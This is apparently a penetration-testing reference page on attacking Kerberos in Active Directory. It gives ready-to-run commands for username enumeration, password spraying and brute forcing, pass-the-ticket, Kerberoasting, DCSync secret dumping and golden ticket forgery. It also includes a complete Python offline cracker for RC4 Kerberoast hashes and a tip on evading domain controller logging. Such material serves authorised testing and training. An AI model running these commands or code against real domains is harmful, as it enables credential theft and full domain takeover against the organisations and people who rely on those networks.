
Kerberos

Default Port: 88 (TCP and UDP)

Kerberos is a network authentication protocol that uses "tickets" issued by a trusted Key Distribution Center (KDC) to let principals prove their identity over an untrusted network without sending their password. It provides mutual authentication: the client verifies the service and the service verifies the client. In Active Directory every domain controller runs a KDC, so finding Kerberos on a host usually means finding a domain controller.

Recon

Identify Kerberos

To find all machines on a network that answer on TCP port 88:

nmap -p 88 --open -Pn -oA nmap/Kerberos 10.0.0.0/24

Once a KDC is known, the krb5-enum-users script confirms valid usernames against it. The KDC answers KDC_ERR_C_PRINCIPAL_UNKNOWN for names that do not exist and KDC_ERR_PREAUTH_REQUIRED for names that do, so no password is needed. The script requires the realm:

nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='DOMAIN.COM' 10.0.0.1

Enumeration

GetUserSPNs

GetUserSPNs.py from Impacket queries LDAP for user accounts that have Service Principal Names (SPNs) set. Any valid domain credential is enough. The output lists the SPN, the owning account, its group memberships and last logon, which reveals service accounts and often their privilege level. Without -request it only enumerates; -request additionally pulls service tickets for cracking (see Kerberoasting below).

python GetUserSPNs.py -dc-ip 10.0.0.1 DOMAIN/user:password

Attack Vectors

Password Guessing

Test for weak passwords on Kerberos-enabled users. Enumerate valid usernames first, then spray one password across the list, or feed user:password pairs to bruteforce. Mind the domain lockout policy: each failed pre-authentication counts against the account and is logged on the DC as event 4771.

kerbrute userenum -d domain.com --dc 10.0.0.1 users.txt

kerbrute passwordspray -d domain.com --dc 10.0.0.1 users.txt 'Winter2023!'

kerbrute bruteforce -d domain.com --dc 10.0.0.1 UsersPasswords.txt

UsersPasswords.txt holds one user:password pair per line.

Pass the Ticket

Once a valid Kerberos ticket is obtained, for example exported from a compromised host with sekurlsa::tickets /export, a PtT (Pass the Ticket) attack can be performed with mimikatz:

mimikatz "kerberos::ptt ticket.kirbi"

Replace "ticket.kirbi" with your Kerberos ticket file.

mimikatz injects the ticket into the current logon session, so subsequent access uses it instead of the account's password or hash: a service ticket grants access only to the service it was issued for, while a TGT lets the session request tickets for any service until it expires. Verify with klist. From Linux, convert the ticket with Impacket's ticketConverter.py to a ccache, point KRB5CCNAME at it and run the Impacket tools with -k -no-pass.

Kerberoasting

User accounts with SPNs can be Kerberoasted. Any authenticated domain user may request a service ticket for an SPN; the ticket's encrypted part is encrypted with the service account's long-term key, which is derived from its password, so the ticket can be cracked offline without touching the DC again. Accounts that still allow RC4 produce $krb5tgs$23$ hashes (hashcat -m 13100); AES-only accounts produce $krb5tgs$18$ hashes (hashcat -m 19700), which crack far more slowly. Computer accounts also carry SPNs but have long random passwords, so only user accounts are worthwhile targets.

python GetUserSPNs.py -request -dc-ip 10.0.0.1 -outputfile kerberoast.txt DOMAIN/user:password

hashcat -m 13100 kerberoast.txt wordlist.txt
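The offline step above is why Kerberoasting works: the ticket's encrypted part is RFC 4757 RC4-HMAC with the service account's NT hash as the key, and a candidate password either verifies the checksum or it does not. The script below is an added example written for this page (not Impacket or hashcat code): it implements NT hash derivation, RC4-HMAC with key usage 2 (a ticket's enc-part), builds a $krb5tgs$23$ line in the format GetUserSPNs.py -outputfile writes, and recovers the password from a wordlist. The service account svc_sql, realm CORP.LOCAL, SPN, ticket contents and password are all constructed for the demonstration. The same primitive, keyed with the krbtgt account's NT hash, is what encrypts a TGT, which is why that single hash is enough for the Golden Ticket attack further down.

```python
"""Offline cracking of an RC4-HMAC (etype 23) Kerberoast hash, i.e. what
hashcat -m 13100 does. Added example for this page; names and data are constructed."""
import hmac
import os
import struct
from hashlib import md5

KEY_USAGE_TICKET = 2  # RFC 4120 key usage for the enc-part of a ticket


def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320), implemented here because many OpenSSL 3 builds disable it."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), list(range(16))),
        (g, 0x5A827999, (3, 5, 9, 13), [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, const, shifts, order in rounds:
            for i, k in enumerate(order):
                a, b, c, d = d, rotl((a + fn(b, c, d) + x[k] + const) & 0xFFFFFFFF, shifts[i % 4]), b, c
        state = [(s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); it doubles as the account's RC4-HMAC Kerberos key."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 keystream XOR (KSA + PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes = None) -> bytes:
    """RFC 4757: K1 = HMAC(K, usage); checksum = HMAC(K1, conf||pt); K3 = HMAC(K1, checksum)."""
    confounder = confounder if confounder is not None else os.urandom(8)
    k1 = hmac.new(key, struct.pack("<I", usage), md5).digest()
    checksum = hmac.new(k1, confounder + plaintext, md5).digest()
    k3 = hmac.new(k1, checksum, md5).digest()
    return checksum + rc4(k3, confounder + plaintext)


def rc4_hmac_decrypt(key: bytes, usage: int, edata: bytes):
    """Return the plaintext, or None when the checksum does not verify (wrong key)."""
    checksum, body = edata[:16], edata[16:]
    k1 = hmac.new(key, struct.pack("<I", usage), md5).digest()
    k3 = hmac.new(k1, checksum, md5).digest()
    plain = rc4(k3, body)
    if not hmac.compare_digest(hmac.new(k1, plain, md5).digest(), checksum):
        return None
    return plain[8:]  # drop the 8-byte confounder


def kerberoast_line(user: str, realm: str, spn: str, edata: bytes) -> str:
    """hashcat -m 13100 format: $krb5tgs$23$*user$realm$spn*$checksum$ciphertext."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${edata[:16].hex()}${edata[16:].hex()}"


def crack_kerberoast(line: str, wordlist):
    """Try each candidate as the service account password; return the first that verifies."""
    if not line.startswith("$krb5tgs$23$"):
        raise ValueError("only RC4-HMAC (etype 23) hashes are handled here")
    checksum_hex, edata_hex = line.rsplit("$", 2)[1:]
    edata = bytes.fromhex(checksum_hex) + bytes.fromhex(edata_hex)
    for candidate in wordlist:
        if rc4_hmac_decrypt(nt_hash(candidate), KEY_USAGE_TICKET, edata) is not None:
            return candidate
    return None


def demo() -> str:
    """Constructed scenario: svc_sql (password 'Summer2023!') has an SPN; we request and crack."""
    enc_ticket_part = b"constructed stand-in for the DER-encoded EncTicketPart"
    edata = rc4_hmac_encrypt(nt_hash("Summer2023!"), KEY_USAGE_TICKET, enc_ticket_part)
    line = kerberoast_line("svc_sql", "CORP.LOCAL", "MSSQLSvc/sql01.corp.local:1433", edata)
    return crack_kerberoast(line, ["Password1", "Welcome1", "Summer2023!", "Winter2023!"])


if __name__ == "__main__":
    print("recovered service account password:", demo())
```

Every candidate costs one MD4, three HMAC-MD5s and one RC4 pass, which is why RC4 tickets fall quickly on GPUs and why disabling RC4 on service accounts (forcing etype 18) is the practical defence.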

Post-Exploitation

Secrets Dumping

With domain-admin level credentials (or any account holding the DS-Replication-Get-Changes rights), the domain's secrets can be pulled from a domain controller to extend the attack. secretsdump.py with -just-dc uses the directory replication protocol (DCSync) to retrieve every account's NT hash and Kerberos keys, including the krbtgt account's, without touching NTDS.dit on disk.

Using secretsdump.py from Impacket:

python secretsdump.py -just-dc domain/Administrator:Password@10.0.0.1

Replace "domain/Administrator:Password" with a valid user and password. Use -just-dc-ntlm for NT hashes only, or -just-dc-user krbtgt to fetch a single account.

Golden Ticket Attack

A golden ticket is a TGT forged offline with the krbtgt account's key (its NT hash when RC4 is used, obtained for example with secretsdump above). Because the KDC trusts anything it can decrypt with that key, the ticket grants virtually unrestricted access to the whole domain for any user and group membership the attacker chooses, and it stays valid until the krbtgt password has been changed twice. With mimikatz:

mimikatz "kerberos::golden /user:Administrator /domain:domain.com /sid:S-1-5-21-XXXX /krbtgt:eeb9046b77d48962314e376f1925065a /id:500 /ptt"

/sid is the domain SID (without the trailing RID), /id:500 is the built-in Administrator RID, and /ptt injects the ticket into the current session; use /ticket:golden.kirbi instead to save it. Prefer /aes256:<krbtgt AES key> over /krbtgt: in domains that have moved to AES, since an RC4-encrypted TGT there stands out in the DC's 4769 and 4768 events.